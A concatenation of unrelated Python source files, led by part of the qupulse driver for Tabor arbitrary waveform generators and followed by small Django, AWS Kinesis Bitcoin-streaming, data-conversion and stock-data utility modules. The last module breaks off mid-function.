TaborProgramMemory(waveform_to_segment=waveform_to_segment, program=tabor_program) # set the default repetionmode for a programm self.set_repetition_mode(program_name=name, repetition_mode=repetition_mode) def remove(self, name: str) -> None: """ Remove a program from the AWG. Also discards all waveforms referenced only by the program identified by name. Args: name (str): The name of the program to remove. """ self._channel_tuple.free_program(name) self._channel_tuple.cleanup() def clear(self) -> None: """ Removes all programs and waveforms from the AWG. Caution: This affects all programs and waveforms on the AWG, not only those uploaded using qupulse! """ self._channel_tuple.device.channels[0]._select() self._channel_tuple.device[SCPI].send_cmd(":TRAC:DEL:ALL") self._channel_tuple.device[SCPI].send_cmd(":SOUR:SEQ:DEL:ALL") self._channel_tuple.device[SCPI].send_cmd(":ASEQ:DEL") self._channel_tuple.device[SCPI].send_cmd(":TRAC:DEF 1, 192") self._channel_tuple.device[SCPI].send_cmd(":TRAC:SEL 1") self._channel_tuple.device[SCPI].send_cmd(":TRAC:MODE COMB") self._channel_tuple.device._send_binary_data(bin_dat=self._channel_tuple._idle_segment.get_as_binary()) self._channel_tuple._segment_lengths = 192 * np.ones(1, dtype=np.uint32) self._channel_tuple._segment_capacity = 192 * np.ones(1, dtype=np.uint32) self._channel_tuple._segment_hashes = np.ones(1, dtype=np.int64) * hash(self._channel_tuple._idle_segment) self._channel_tuple._segment_references = np.ones(1, dtype=np.uint32) self._channel_tuple._advanced_sequence_table = [] self._channel_tuple._sequencer_tables = [] self._channel_tuple._known_programs = dict() self._change_armed_program(None) @with_select def arm(self, name: Optional[str]) -> None: """ Load the program 'name' and arm the device for running it. Args: name (str): the program the device should change to """ if self._channel_tuple._current_program == name: self._channel_tuple.device[SCPI].send_cmd("SEQ:SEL 1") else: self._change_armed_program(name) @property def programs(self) -> Set[str]: """The set of program names that can currently be executed on the hardware AWG.""" return set(program.name for program in self._channel_tuple._known_programs.keys()) @with_select def run_current_program(self) -> None: """ This method starts running the active program Throws: RuntimeError: This exception is thrown if there is no active program for this device """ if (self._channel_tuple.device._is_coupled()): # channel tuple is the first channel tuple if (self._channel_tuple.device._channel_tuples[0] == self): if self._channel_tuple._current_program: repetition_mode = self._channel_tuple._known_programs[ self._channel_tuple._current_program].program._repetition_mode if repetition_mode == "infinite": self._cont_repetition_mode() self._channel_tuple.device[SCPI].send_cmd(':TRIG', paranoia_level=self._channel_tuple.internal_paranoia_level) else: raise ValueError("{} is no vaild repetition mode".format(repetition_mode)) else: raise RuntimeError("No program active") else: warnings.warn( "TaborWarning - run_current_program() - the device is coupled - runthe program via the first channel tuple") else: if self._channel_tuple._current_program: repetition_mode = self._channel_tuple._known_programs[ self._channel_tuple._current_program].program._repetition_mode if repetition_mode == "infinite": self._cont_repetition_mode() self._channel_tuple.device[SCPI].send_cmd(':TRIG', paranoia_level=self._channel_tuple.internal_paranoia_level) else: raise ValueError("{} is no vaild repetition mode".format(repetition_mode)) else: raise RuntimeError("No program active") @with_select @with_configuration_guard def _change_armed_program(self, name: Optional[str]) -> None: """The armed program of the channel tuple is changed to the program with the name 'name'""" if name is None: sequencer_tables = [self._idle_sequence_table] advanced_sequencer_table = [(1, 1, 0)] else: waveform_to_segment_index, program = self._channel_tuple._known_programs[name] waveform_to_segment_number = waveform_to_segment_index + 1 # translate waveform number to actual segment sequencer_tables = [[(rep_count, waveform_to_segment_number[wf_index], jump_flag) for ((rep_count, wf_index, jump_flag), _) in sequencer_table] for sequencer_table in program.get_sequencer_tables()] # insert idle sequence sequencer_tables = [self._idle_sequence_table] + sequencer_tables # adjust advanced sequence table entries by idle sequence table offset advanced_sequencer_table = [(rep_count, seq_no + 1, jump_flag) for rep_count, seq_no, jump_flag in program.get_advanced_sequencer_table()] if program.waveform_mode == TaborSequencing.SINGLE: assert len(advanced_sequencer_table) == 1 assert len(sequencer_tables) == 2 while len(sequencer_tables[1]) < self._channel_tuple.device.dev_properties["min_seq_len"]: assert advanced_sequencer_table[0][0] == 1 sequencer_tables[1].append((1, 1, 0)) # insert idle sequence in advanced sequence table advanced_sequencer_table = [(1, 1, 0)] + advanced_sequencer_table while len(advanced_sequencer_table) < self._channel_tuple.device.dev_properties["min_aseq_len"]: advanced_sequencer_table.append((1, 1, 0)) self._channel_tuple.device[SCPI].send_cmd("SEQ:DEL:ALL", paranoia_level=self._channel_tuple.internal_paranoia_level) self._channel_tuple._sequencer_tables = [] self._channel_tuple.device[SCPI].send_cmd("ASEQ:DEL", paranoia_level=self._channel_tuple.internal_paranoia_level) self._channel_tuple._advanced_sequence_table = [] # download all sequence tables for i, sequencer_table in enumerate(sequencer_tables): self._channel_tuple.device[SCPI].send_cmd("SEQ:SEL {}".format(i + 1), paranoia_level=self._channel_tuple.internal_paranoia_level) self._channel_tuple.device._download_sequencer_table(sequencer_table) self._channel_tuple._sequencer_tables = sequencer_tables self._channel_tuple.device[SCPI].send_cmd("SEQ:SEL 1", paranoia_level=self._channel_tuple.internal_paranoia_level) self._channel_tuple.device._download_adv_seq_table(advanced_sequencer_table) self._channel_tuple._advanced_sequence_table = advanced_sequencer_table self._channel_tuple._current_program = name def _select(self): self._channel_tuple.channels[0]._select() @property def _configuration_guard_count(self): return self._channel_tuple._configuration_guard_count @_configuration_guard_count.setter def _configuration_guard_count(self, configuration_guard_count): self._channel_tuple._configuration_guard_count = configuration_guard_count def _enter_config_mode(self): self._channel_tuple._enter_config_mode() def _exit_config_mode(self): self._channel_tuple._exit_config_mode() @with_select def _cont_repetition_mode(self): """Changes the run mode of this channel tuple to continous mode""" self._channel_tuple.device[SCPI].send_cmd(f":TRIG:SOUR:ADV EXT") self._channel_tuple.device[SCPI].send_cmd( f":INIT:GATE OFF; :INIT:CONT ON; :INIT:CONT:ENAB ARM; :INIT:CONT:ENAB:SOUR {self._trigger_source}") class TaborVolatileParameters(VolatileParameters): def __init__(self, channel_tuple: "TaborChannelTuple", ): super().__init__(channel_tuple=channel_tuple) def set_volatile_parameters(self, program_name: str, parameters: Mapping[str, numbers.Number]) -> None: """ Set the values of parameters which were marked as volatile on program creation. Sets volatile parameters in program memory and device's (adv.) sequence tables if program is current program. If set_volatile_parameters needs to run faster, set CONFIG_MODE_PARANOIA_LEVEL to 0 which causes the device to enter the configuration mode with paranoia level 0 (Note: paranoia level 0 does not work for the simulator) and set device._is_coupled. Args: program_name: Name of program which should be changed. parameters: Names of volatile parameters and respective values to which they should be set. """ waveform_to_segment_index, program = self._channel_tuple._known_programs[program_name] modifications = program.update_volatile_parameters(parameters) self._channel_tuple.logger.debug("parameter modifications: %r" % modifications) if not modifications: self._channel_tuple.logger.info( "There are no volatile parameters to update. Either there are no volatile parameters with " "these names,\nthe respective repetition counts already have the given values or the " "volatile parameters were dropped during upload.") return if program_name == self._channel_tuple._current_program: commands = [] for position, entry in modifications.items(): if not entry.repetition_count > 0: raise ValueError("Repetition must be > 0") if isinstance(position, int): commands.append(":ASEQ:DEF {},{},{},{}".format(position + 1, entry.element_number + 1, entry.repetition_count, entry.jump_flag)) else: table_num, step_num = position commands.append(":SEQ:SEL {}".format(table_num + 2)) commands.append(":SEQ:DEF {},{},{},{}".format(step_num, waveform_to_segment_index[entry.element_id] + 1, entry.repetition_count, entry.jump_flag)) self._channel_tuple._execute_multiple_commands_with_config_guard(commands) # Wait until AWG is finished _ = self._channel_tuple.device.main_instrument._visa_inst.query("*OPC?") class TaborReadProgram(ReadProgram): def __init__(self, channel_tuple: "TaborChannelTuple", ): super().__init__(channel_tuple=channel_tuple) def read_complete_program(self): return PlottableProgram.from_read_data(self._channel_tuple.read_waveforms(), self._channel_tuple.read_sequence_tables(), self._channel_tuple.read_advanced_sequencer_table()) # Implementation class TaborChannelTuple(AWGChannelTuple): CONFIG_MODE_PARANOIA_LEVEL = None def __init__(self, idn: int, device: TaborDevice, channels: Iterable["TaborChannel"], marker_channels: Iterable["TaborMarkerChannel"]): super().__init__(idn) self._device = weakref.ref(device) self._configuration_guard_count = 0 self._is_in_config_mode = False self._channels = tuple(channels) self._marker_channels = tuple(marker_channels) # the channel and channel marker are assigned to this channel tuple for channel in self.channels: channel._set_channel_tuple(self) for marker_ch in self.marker_channels: marker_ch._set_channel_tuple(self) # adding Features self.add_feature(TaborProgramManagement(self)) self.add_feature(TaborVolatileParameters(self)) self._idle_segment = TaborSegment.from_sampled(voltage_to_uint16(voltage=np.zeros(192), output_amplitude=0.5, output_offset=0., resolution=14), voltage_to_uint16(voltage=np.zeros(192), output_amplitude=0.5, output_offset=0., resolution=14), None, None) self._known_programs = dict() # type: Dict[str, TaborProgramMemory] self._current_program = None self._segment_lengths = None self._segment_capacity = None self._segment_hashes = None self._segment_references = None self._sequencer_tables = None self._advanced_sequence_table = None self._internal_paranoia_level = 0 self[TaborProgramManagement].clear() self._channel_tuple_adapter: ChannelTupleAdapter @property def internal_paranoia_level(self) -> Optional[int]: return self._internal_paranoia_level @property def logger(self): return logging.getLogger("qupulse.tabor") @property def channel_tuple_adapter(self) -> ChannelTupleAdapter: if self._channel_tuple_adapter is None: self._channel_tuple_adapter = ChannelTupleAdapter(self) return self._channel_tuple_adapter def _select(self) -> None: """The channel tuple is selected, which means that the first channel of the channel tuple is selected""" self.channels[0]._select() @property def device(self) -> TaborDevice: """Returns the device that the channel tuple belongs to""" return self._device() @property def channels(self) -> Collection["TaborChannel"]: """Returns all channels of the channel tuple""" return self._channels @property def marker_channels(self) -> Collection["TaborMarkerChannel"]: """Returns all marker channels of the channel tuple""" return self._marker_channels @property @with_select def sample_rate(self) -> TimeType: """Returns the sample rate that the channels of a channel tuple have""" return TimeType.from_float( float(self.device[SCPI].send_query(":FREQ:RAST?".format(channel=self.channels[0].idn)))) @property def total_capacity(self) -> int: return int(self.device.dev_properties["max_arb_mem"]) // 2 def free_program(self, name: str) -> TaborProgramMemory: if name is None: raise TaborException("Removing 'None' program is forbidden.") program = self._known_programs.pop(name) self._segment_references[program.waveform_to_segment] -= 1 if self._current_program == name: self[TaborProgramManagement]._change_armed_program(None) return program @property def _segment_reserved(self) -> np.ndarray: return self._segment_references > 0 @property def _free_points_in_total(self) -> int: return self.total_capacity - np.sum(self._segment_capacity[self._segment_reserved]) @property def _free_points_at_end(self) -> int: reserved_index = np.flatnonzero(self._segment_reserved) if len(reserved_index): return self.total_capacity - np.sum(self._segment_capacity[:reserved_index[-1]]) else: return self.total_capacity @with_select def read_waveforms(self) -> List[np.ndarray]: device = self.device._get_readable_device(simulator=True) old_segment = device.send_query(":TRAC:SEL?") waveforms = [] uploaded_waveform_indices = np.flatnonzero( self._segment_references) + 1 for segment in uploaded_waveform_indices: device.send_cmd(":TRAC:SEL {}".format(segment), paranoia_level=self.internal_paranoia_level) waveforms.append(device.read_segment_data()) device.send_cmd(":TRAC:SEL {}".format(old_segment), paranoia_level=self.internal_paranoia_level) return waveforms @with_select def read_sequence_tables(self) -> List[Tuple[np.ndarray, np.ndarray, np.ndarray]]: device = self.device._get_readable_device(simulator=True) old_sequence = device.send_query(":SEQ:SEL?") sequences = [] uploaded_sequence_indices = np.arange(len(self._sequencer_tables)) + 1 for sequence in uploaded_sequence_indices: device.send_cmd(":SEQ:SEL {}".format(sequence), paranoia_level=self.internal_paranoia_level) table = device.read_sequencer_table() sequences.append((table['repeats'], table['segment_no'], table['jump_flag'])) device.send_cmd(":SEQ:SEL {}".format(old_sequence), paranoia_level=self.internal_paranoia_level) return sequences @with_select def read_advanced_sequencer_table(self) -> Tuple[np.ndarray, np.ndarray, np.ndarray]: table = self.device._get_readable_device(simulator=True).read_advanced_sequencer_table() return table['repeats'], table['segment_no'], table['jump_flag'] def read_complete_program(self) -> PlottableProgram: return PlottableProgram.from_read_data(self.read_waveforms(), self.read_sequence_tables(), self.read_advanced_sequencer_table()) def _find_place_for_segments_in_memory(self, segments: Sequence, segment_lengths: np.ndarray) -> \ Tuple[np.ndarray, np.ndarray, np.ndarray]: # TODO: comment was not finished """ 1. Find known segments 2. Find empty spaces with fitting length 3. Find empty spaces with bigger length 4. Amend remaining segments Args: segments (Sequence): segment_length (Sequence): Returns: """ segment_hashes = np.fromiter((hash(segment) for segment in segments), count=len(segments), dtype=np.int64) waveform_to_segment = find_positions(self._segment_hashes, segment_hashes) # separate into known and unknown unknown = (waveform_to_segment == -1) known = ~unknown known_pos_in_memory = waveform_to_segment[known] assert len(known_pos_in_memory) == 0 or np.all( self._segment_hashes[known_pos_in_memory] == segment_hashes[known]) new_reference_counter = self._segment_references.copy() new_reference_counter[known_pos_in_memory] += 1 to_upload_size = np.sum(segment_lengths[unknown] + 16) free_points_in_total = self.total_capacity - np.sum(self._segment_capacity[self._segment_references > 0]) if free_points_in_total < to_upload_size: raise MemoryError("Not enough free memory", free_points_in_total, to_upload_size, self._free_points_in_total) to_amend = cast(np.ndarray, unknown) to_insert = np.full(len(segments), fill_value=-1, dtype=np.int64) reserved_indices = np.flatnonzero(new_reference_counter > 0) first_free = reserved_indices[-1] + 1 if len(reserved_indices) else 0 free_segments = new_reference_counter[:first_free] == 0 free_segment_count = np.sum(free_segments) # look for a free segment place with the same length for segment_idx in np.flatnonzero(to_amend): if free_segment_count == 0: break pos_of_same_length = np.logical_and(free_segments, segment_lengths[segment_idx] == self._segment_capacity[:first_free]) idx_same_length = np.argmax(pos_of_same_length) if pos_of_same_length[idx_same_length]: free_segments[idx_same_length] = False free_segment_count -= 1 to_amend[segment_idx] = False to_insert[segment_idx] = idx_same_length # try to find places that are larger than the segments to fit in starting with the large segments and large # free spaces segment_indices = np.flatnonzero(to_amend)[np.argsort(segment_lengths[to_amend])[::-1]] capacities = self._segment_capacity[:first_free] for segment_idx in segment_indices: free_capacities = capacities[free_segments] free_segments_indices = np.flatnonzero(free_segments)[np.argsort(free_capacities)[::-1]] if len(free_segments_indices) == 0: break fitting_segment = np.argmax((free_capacities >= segment_lengths[segment_idx])[::-1]) fitting_segment = free_segments_indices[fitting_segment] if self._segment_capacity[fitting_segment] >= segment_lengths[segment_idx]: free_segments[fitting_segment] = False to_amend[segment_idx] = False to_insert[segment_idx] = fitting_segment free_points_at_end = self.total_capacity - np.sum(self._segment_capacity[:first_free]) if np.sum(segment_lengths[to_amend] + 16) > free_points_at_end: raise MemoryError("Fragmentation does not allow upload.", np.sum(segment_lengths[to_amend] + 16), free_points_at_end, self._free_points_at_end) return waveform_to_segment, to_amend, to_insert @with_select @with_configuration_guard def _upload_segment(self, segment_index: int, segment: TaborSegment) -> None: if self._segment_references[segment_index] > 0: raise ValueError("Reference count not zero") if segment.num_points > self._segment_capacity[segment_index]: raise ValueError("Cannot upload segment here.") segment_no = segment_index + 1 self.device[TaborSCPI].send_cmd(":TRAC:DEF {}, {}".format(segment_no, segment.num_points), paranoia_level=self.internal_paranoia_level) self._segment_lengths[segment_index] = segment.num_points self.device[TaborSCPI].send_cmd(":TRAC:SEL {}".format(segment_no), paranoia_level=self.internal_paranoia_level) self.device[TaborSCPI].send_cmd(":TRAC:MODE COMB", paranoia_level=self.internal_paranoia_level) wf_data = segment.get_as_binary() self.device._send_binary_data(bin_dat=wf_data) self._segment_references[segment_index] = 1 self._segment_hashes[segment_index] = hash(segment) @with_select @with_configuration_guard def _amend_segments(self, segments: List[TaborSegment]) -> np.ndarray: new_lengths = np.asarray([s.num_points for s in segments], dtype=np.uint32) wf_data = make_combined_wave(segments) trac_len = len(wf_data) // 2 segment_index = len(self._segment_capacity) first_segment_number = segment_index + 1 self.device[TaborSCPI].send_cmd(":TRAC:DEF {},{}".format(first_segment_number, trac_len), paranoia_level=self.internal_paranoia_level) self.device[TaborSCPI].send_cmd(":TRAC:SEL {}".format(first_segment_number), paranoia_level=self.internal_paranoia_level) self.device[TaborSCPI].send_cmd(":TRAC:MODE COMB", paranoia_level=self.internal_paranoia_level) self.device._send_binary_data(bin_dat=wf_data) old_to_update = np.count_nonzero(self._segment_capacity != self._segment_lengths) segment_capacity = np.concatenate((self._segment_capacity, new_lengths)) segment_lengths = np.concatenate((self._segment_lengths, new_lengths)) segment_references = np.concatenate((self._segment_references, np.ones(len(segments), dtype=int))) segment_hashes = np.concatenate((self._segment_hashes, [hash(s) for s in segments])) if len(segments) < old_to_update: for i, segment in enumerate(segments): current_segment_number = first_segment_number + i self.device[TaborSCPI].send_cmd(":TRAC:DEF {},{}".format(current_segment_number, segment.num_points), paranoia_level=self.internal_paranoia_level) else: # flush the capacity self.device._download_segment_lengths(segment_capacity) # update non fitting lengths for i in np.flatnonzero(segment_capacity != segment_lengths): self.device[SCPI].send_cmd(":TRAC:DEF {},{}".format(i + 1, segment_lengths[i])) self._segment_capacity = segment_capacity self._segment_lengths = segment_lengths self._segment_hashes = segment_hashes self._segment_references = segment_references return segment_index + np.arange(len(segments), dtype=np.int64) @with_select @with_configuration_guard def cleanup(self) -> None: """Discard all segments after the last which is still referenced""" reserved_indices = np.flatnonzero(self._segment_references > 0) old_end = len(self._segment_lengths) new_end = reserved_indices[-1] + 1 if len(reserved_indices) else 0 self._segment_lengths = self._segment_lengths[:new_end] self._segment_capacity = self._segment_capacity[:new_end] self._segment_hashes = self._segment_hashes[:new_end] self._segment_references = self._segment_references[:new_end] try: # send max 10 commands at once chunk_size = 10 for chunk_start in range(new_end, old_end, chunk_size): self.device[SCPI].send_cmd("; ".join("TRAC:DEL {}".format(i + 1) for i in range(chunk_start, min(chunk_start + chunk_size, old_end)))) except Exception as e: raise TaborUndefinedState("Error during cleanup. Device is in undefined state.", device=self) from e @with_configuration_guard def _execute_multiple_commands_with_config_guard(self, commands: List[str]) -> None: """ Joins the given commands into one and executes it with configuration guard. Args: commands: Commands that should be executed. """ cmd_str = ";".join(commands) self.device[TaborSCPI].send_cmd(cmd_str, paranoia_level=self.internal_paranoia_level) def _enter_config_mode(self) -> None: """ Enter the configuration mode if not already in. All outputs are set to the DC offset of the device and the sequencing is disabled. The manual states this speeds up sequence validation when uploading multiple sequences. When entering and leaving the configuration mode the AWG outputs a small (~60 mV in 4 V mode) blip. """ if self._is_in_config_mode is False: # 1. Selct channel pair # 2. Select DC as function shape # 3. Select build-in waveform mode if self.device._is_coupled(): out_cmd = ":OUTP:ALL OFF" else: out_cmd = "" for channel in self.channels: out_cmd = out_cmd + ":INST:SEL {ch_id}; :OUTP OFF;".format(ch_id=channel.idn) marker_0_cmd = ":SOUR:MARK:SEL 1;:SOUR:MARK:SOUR USER;:SOUR:MARK:STAT OFF" marker_1_cmd = ":SOUR:MARK:SEL 2;:SOUR:MARK:SOUR USER;:SOUR:MARK:STAT OFF" wf_mode_cmd = ":SOUR:FUNC:MODE FIX" cmd = ";".join([marker_0_cmd, marker_1_cmd, wf_mode_cmd]) cmd = out_cmd + cmd self.device[TaborSCPI].send_cmd(cmd, paranoia_level=self.CONFIG_MODE_PARANOIA_LEVEL) self._is_in_config_mode = True @with_select def _exit_config_mode(self) -> None: """Leave the configuration mode. Enter advanced sequence mode and turn on all outputs""" if self.device._is_coupled(): # Coupled -> switch all channels at once other_channel_tuple: TaborChannelTuple if self.channels == self.device.channel_tuples[0].channels: other_channel_tuple = self.device.channel_tuples[1] else: other_channel_tuple = self.device.channel_tuples[0] if not other_channel_tuple._is_in_config_mode: self.device[SCPI].send_cmd(":SOUR:FUNC:MODE ASEQ") self.device[SCPI].send_cmd(":SEQ:SEL 1") self.device[SCPI].send_cmd(":OUTP:ALL ON") else: self.device[SCPI].send_cmd(":SOUR:FUNC:MODE ASEQ") self.device[SCPI].send_cmd(":SEQ:SEL 1") for channel in self.channels: channel[ActivatableChannels].enable() for marker_ch in self.marker_channels: marker_ch[ActivatableChannels].enable() self._is_in_config_mode = False ######################################################################################################################## # Marker Channel ######################################################################################################################## # Features class TaborActivatableMarkerChannels(ActivatableChannels): def __init__(self, marker_channel: "TaborMarkerChannel"): super().__init__() self._parent = weakref.ref(marker_channel) @property def enabled(self) -> bool: """ Returns the the state a marker channel has at the moment. A channel is either activated or deactivated True stands for activated and false for deactivated """ return self._parent().device[SCPI].send_query(":MARK:STAT ?") == "ON" @with_select def enable(self): """Enables the output of a certain marker channel""" command_string = "SOUR:MARK:SOUR USER; :SOUR:MARK:STAT ON" command_string = command_string.format( channel=self._parent().channel_tuple.channels[0].idn, marker=self._parent().channel_tuple.marker_channels.index(self._parent()) + 1) self._parent().device[SCPI].send_cmd(command_string) @with_select def disable(self): """Disable the output of a certain marker channel""" command_string = ":SOUR:MARK:SOUR USER; :SOUR:MARK:STAT OFF" command_string = command_string.format( channel=self._parent().channel_tuple.channels[0].idn, marker=self._parent().channel_tuple.marker_channels.index(self._parent()) + 1) self._parent().device[SCPI].send_cmd(command_string) def _select(self) -> None: self._parent()._select() # Implementation class TaborMarkerChannel(AWGMarkerChannel): def __init__(self, idn: int, device: TaborDevice): super().__init__(idn) self._device = weakref.ref(device) # adding Features self.add_feature(TaborActivatableMarkerChannels(self)) @property def device(self) -> TaborDevice: """Returns the device that this marker channel belongs to""" return self._device() @property def channel_tuple(self) -> TaborChannelTuple: """Returns the channel tuple that this marker channel belongs to""" return self._channel_tuple() def _set_channel_tuple(self, channel_tuple: TaborChannelTuple) -> None: """ The channel tuple 'channel_tuple' is assigned to this marker channel Args: channel_tuple (TaborChannelTuple): the channel tuple that this marker channel belongs to """ self._channel_tuple = weakref.ref(channel_tuple) def _select(self) -> None: """ This marker channel is selected and is now the active channel marker of the device """ self.device.channels[int((self.idn - 1) / 2)]._select() self.device[SCPI].send_cmd(":SOUR:MARK:SEL {marker}".format(marker=(((self.idn - 1) % 2) + 1))) class TaborUndefinedState(TaborException): """ If this exception is raised the attached tabor device is in an undefined state. It is highly recommended to call reset it.f """ def __init__(self, *args, device: Union[TaborDevice, TaborChannelTuple]): super().__init__(*args) self.device = device def reset_device(self): if isinstance(self.device, TaborDevice): self.device[TaborDeviceControl].reset() elif isinstance(self.device, TaborChannelTuple): self.device.cleanup() self.device[TaborProgramManagement].clear()
from plustutocenter.controller.concretecontroller import ConcreteController from plustutocenter.qt.view_qt import ViewQt controller = ConcreteController() controller.setView(ViewQt(controller)) controller.startApp()
ls = [] for i in range(10_000_000): ls.append(i)
import pkg_resources try: __version__ = pkg_resources.get_distribution(__name__).version except pkg_resources.DistributionNotFound: __version__ = 'unknown' import logging logging.addLevelName(5, "TRACE") logging.TRACE = 5 logging.Logger.trace = lambda self, msg, *args, **kwargs: \ self.log(logging.TRACE, msg, *args, **kwargs)
from __future__ import absolute_import import argparse from datetime import datetime import logging import Queue import sys import time import threading import uuid import boto3 import msgpack import strongfellowbtc.constants as constants import strongfellowbtc.hex from strongfellowbtc.protocol import ds256 import strongfellowbtc.zmq from strongfellowbtc.logging import configure_logging def k(region): return boto3.client('kinesis', region_name=region) def _stream_name(region, env): return 'transactions-{region}-{env}'.format(region=region, env=env) def little_endian_long(n): bs = bytearray(8) i = 0 while n != 0: bs[i] = n & 0xff n = (n >> 8) i += 1 return bytes(bs) def create_stream(args=None): configure_logging() if args is None: args = sys.argv[1:] parser = argparse.ArgumentParser() parser.add_argument('--region', required=True) parser.add_argument('--env', required=True) parser.add_argument('--host', required=True) parser.add_argument('--shard-count', default='1', type=int) params = parser.parse_args(args) kinesis = k(params.region) stream_name = _stream_name(region=params.region, env=params.env) shard_count = params.shard_count logging.info('creating stream %s with shard count %d', stream_name, shard_count) response = kinesis.create_stream( StreamName=stream_name, ShardCount=shard_count ) logging.info('success: created stream %s with shard count %d', stream_name, shard_count) def stream_incoming_transactions(args=None): configure_logging() if args is None: args = sys.argv[1:] parser = argparse.ArgumentParser() parser.add_argument('--maxsize', type=int, default='300') parser.add_argument('--txport', type=int, default=str(constants.RAW_TX_PORT)) parser.add_argument('--region', required=True) parser.add_argument('--env', required=True) parser.add_argument('--host', required=True) parser.add_argument('--network', default='main', choices=constants.NETWORKS.keys()) args = parser.parse_args(args) q = Queue.Queue(maxsize=args.maxsize) def produce(q): with strongfellowbtc.zmq.socket(port=args.txport, topic='rawtx') as socket: while True: topic, tx = socket.recv_multipart() delta = datetime.now() - datetime(1970, 1, 1) ms = long(delta.total_seconds() * 1000) try: q.put_nowait((ms, tx)) except Queue.Full: logging.exception('Queue is Full: we cant put %s' % strongfellowbtc.hex.little_endian_hex(ds256(tx))) def consume(q): kinesis = k(region=args.region) stream_name = _stream_name(region=args.region, env=args.env) while True: if q.empty(): time.sleep(1) logging.info('no transactions, sleeping for a second') else: records = [] n = q.qsize() logging.info('%d transactions equeued', n) while len(records) < n: ms, tx = q.get_nowait() data = msgpack.packb({ 't': ms, # milliseconds since epoch 'x': tx, # the transaction 'h': args.host, # short name of the host 'n': args.network # main, testnet, segnet, etc. }) partition_key = strongfellowbtc.hex.big_endian_hex(ds256(tx)) record = { 'Data': data, 'PartitionKey': partition_key } records.append(record) try: response = kinesis.put_records( Records=records, StreamName=stream_name ) logging.info('response was: %s', response) logging.info('SUCCESS putting records') except: logging.exception('problem putting records') time.sleep(3) t1 = threading.Thread(target=produce, args=(q,)) t2 = threading.Thread(target=consume, args=(q,)) t1.start() t2.start() logging.info('join us, wont you?') t1.join() t2.join() def test_get_records(args = None): configure_logging() if args is None: args = sys.argv[1:] parser = argparse.ArgumentParser() parser.add_argument('--region', required=True) parser.add_argument('--env', required=True) parser.add_argument('--host', required=True) params = parser.parse_args(args) kinesis = k(region=params.region) stream_name = _stream_name(region=params.region, env=params.env) shard_id = 'shardId-000000000000' shard_iterator = kinesis.get_shard_iterator(StreamName=stream_name, ShardId=shard_id, ShardIteratorType="LATEST")['ShardIterator'] while True: response = kinesis.get_records(ShardIterator=shard_iterator, Limit=1000) shard_iterator = response['NextShardIterator'] for record in response['Records']: d = msgpack.unpackb(record['Data']) for key in d: print 'key: %s' % key print strongfellowbtc.hex.big_endian_hex(ds256(d['x'])) print response time.sleep(1)
# -*- coding: utf-8 from django.apps import AppConfig class PublishableModelConfig(AppConfig): name = 'publishable_model'
""" Funtion Generates the mutiplication tables """ def multiplication_tables_generator(times: int, min: int, max: int) -> list: """ >>> multiplication_tables_generator(2, 1, 10) ['1 x 2 = 2', '2 x 2 = 4', '3 x 2 = 6', '4 x 2 = 8', '5 x 2 = 10', '6 x 2 = 12', '7 x 2 = 14', '8 x 2 = 16', '9 x 2 = 18', '10 x 2 = 20'] """ tables = [] for number in range(min, max + 1): tables.append(f"{number} x {times} = {number * times}") return tables if __name__ == "__main__": import doctest doctest.testmod() table = int(input("Enter the Table Number: ")) miny = int(input("Enter the Minimum Valve: ")) maxy = int(input("Enter the Maximum Valve: ")) for table in multiplication_tables_generator(table, miny, maxy): print(table)
from datetime import date from django.contrib.auth.models import User, AbstractUser, UserManager from django.db import models from django.utils.translation import gettext_lazy as _ from .validators import validate_born_date class CustomUserManager(UserManager): def create_superuser(self, username, email, password, **extra_fields): extra_fields.setdefault('occupation', 'ADMIN') if extra_fields.get('occupation') is not 'ADMIN': raise ValueError('Superuser must have occupation=ADMIN.') return super().create_superuser(username, email, password, **extra_fields) class Profile(AbstractUser): OCCUPATION_TYPE = ( ('FAC', _('Functionary of Migratory acts')), ('FUF', _('Functionary of Finance')), ('BDAC', _('Boss of Migratory acts')), ('DIR', _('Director')), ('ADMIN', _('Administrator')), ) born_date = models.DateField(_('Born date'), blank=True, null=True, validators=[validate_born_date]) occupation = models.CharField(_('Occupation'), max_length=5, choices=OCCUPATION_TYPE, default='FAC') objects = CustomUserManager() class Meta: verbose_name = _('Profile') verbose_name_plural = _('Profiles') def age(self): if self.born_date: return _('%(years)d years') % {'years': date.today().year - self.born_date.year} else: return None def __str__(self): if self.first_name and self.last_name: return self.get_full_name() else: return self.username
def from_h5(item, trajectory_item=None, atom_indices='all', frame_indices='all'): from molsysmt.forms.api_h5 import to_mdtraj_Topology as h5_to_mdtraj_Topology from molsysmt.native.io.topology import from_mdtraj_Topology as mdtraj_Topology_to_molsysmt_Topology tmp_item = h5_to_mdtraj_Topology(item) tmp_item = mdtraj_Topology_to_molsysmt_Topology(tmp_item) return tmp_item
""" 动态信息 """ import json import os import re from functools import partial from shutil import rmtree import numpy as np import pandas as pd from logbook import Logger from odo import odo from cswd.common.utils import data_root, ensure_list from cswd.sql.constants import MARGIN_MAPS from .base import STOCK_DB, bcolz_table_path from .utils import _normalize_ad_ts_sid LABEL_MAPS = {'日期': 'asof_date', '股票代码': 'sid'} DYNAMIC_TABLES = ['adjustments', 'margins', 'special_treatments','short_names'] logger = Logger('动态数据') def normalized_dividend_data(df): """每股现金股利""" raw_df = df[['股票代码', '日期', '派息']].copy() raw_df.rename(columns=LABEL_MAPS, inplace=True) raw_df.rename(columns={'派息': 'amount'}, inplace=True) # 截止日期为发放日期前一天 raw_df['asof_date'] = pd.to_datetime(raw_df['asof_date']) - pd.Timedelta(days=1) return raw_df def normalized_margins_data(df): """融资融券数据""" df.drop(['更新时间', '序号'], axis=1, inplace=True) df.rename(columns=LABEL_MAPS, inplace=True) df.rename(columns={v: k for k, v in MARGIN_MAPS.items()}, inplace=True) return df # # TODO:使用日线数据简化代替 def normalized_short_names_data(df): """股票简称数据""" # 股票未上市或者新上市,暂无股票代码 df = df[~df['股票代码'].isna()].copy() df.drop(['更新时间', '序号', '备注说明'], axis=1, inplace=True) df.rename(columns=LABEL_MAPS, inplace=True) df.rename(columns={'股票简称': 'short_name'}, inplace=True) # 原为实施日期,截止日期前移一天 df['asof_date'] = df['asof_date'] - pd.Timedelta(days=1) return df # # TODO:股票简称-> 转换 def normalized_special_treatments_data(df): """特殊处理历史""" # 股票未上市或者新上市,暂无股票代码 df = df[~df['股票代码'].isna()] df = df[['股票代码', '日期', '特别处理']].copy() df.rename(columns=LABEL_MAPS, inplace=True) df.rename(columns={'特别处理': 'treatment'}, inplace=True) # 原为实施日期,截止日期前移一天 df['asof_date'] = df['asof_date'] - pd.Timedelta(days=1) return df def _factory(table_name): if table_name == 'adjustments': return normalized_dividend_data elif table_name == 'short_names': 